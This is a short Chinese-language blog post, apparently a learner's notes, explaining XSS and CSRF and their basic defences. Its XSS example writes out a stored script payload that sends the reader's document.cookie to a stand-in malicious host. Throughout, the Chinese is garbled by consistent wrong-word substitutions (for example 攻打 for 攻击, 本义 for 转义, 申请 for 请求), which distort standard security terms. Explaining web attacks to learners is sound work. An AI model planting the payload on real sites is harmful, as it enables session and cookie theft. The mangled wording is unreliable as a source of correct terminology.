前言: 最近在看web网络安全的常识, 刚好看到了 XSS 和CSRF , 就上来记录下, 也算增强下本人的了解,了解不到位的中央请各位大神多多斧正啊 !
XSS: 跨站脚本攻打 ; 这个还是比拟好了解哈 ! 就是在你的网站上植入一些歹意的脚本,通过一些脚本 能够把想要的信息偷出来哈 。
举个例子: 比方你去某博客上写评论。评论写了这样<script>window.open('www.eyi.com?cookie' +document.cookie)</script> 一段代码, 而后存到数据库;当他人去看你这个评论的时候 ,间接从服务器下载下来,前端如果间接解析的话, 就会把你的cookie的相干信息偷出来 。
那如何防止你, 个别都是给用用输出的信息进行本义。切记 不能间接用js进行解析。
CSRF:跨站申请伪造 。 这个次要是利用了浏览器会主动带上cookie 的机制。目前很多服务还是用cookie 来做身份认证的 。
举个列子: 当你在A网站登入了之后。 那每次申请A网站,浏览器会主动带上cookie做身份认证, 服务会返回数据。 如果在以后浏览器你有关上的第三方网站, 如果这网站也有接口是拜访A网站的 , 那么浏览器也会主动带上cookie,这个时候服务器也会把这个申请当做你登入的申请,而后后果可想而知了 。。。。。
如何防止:应用token 做身份认证。或是用签名也能够了。
好了! 明天就写到这里 , 喜爱的同学点个赞! 写的不好的中央 还望各位大佬斧正哈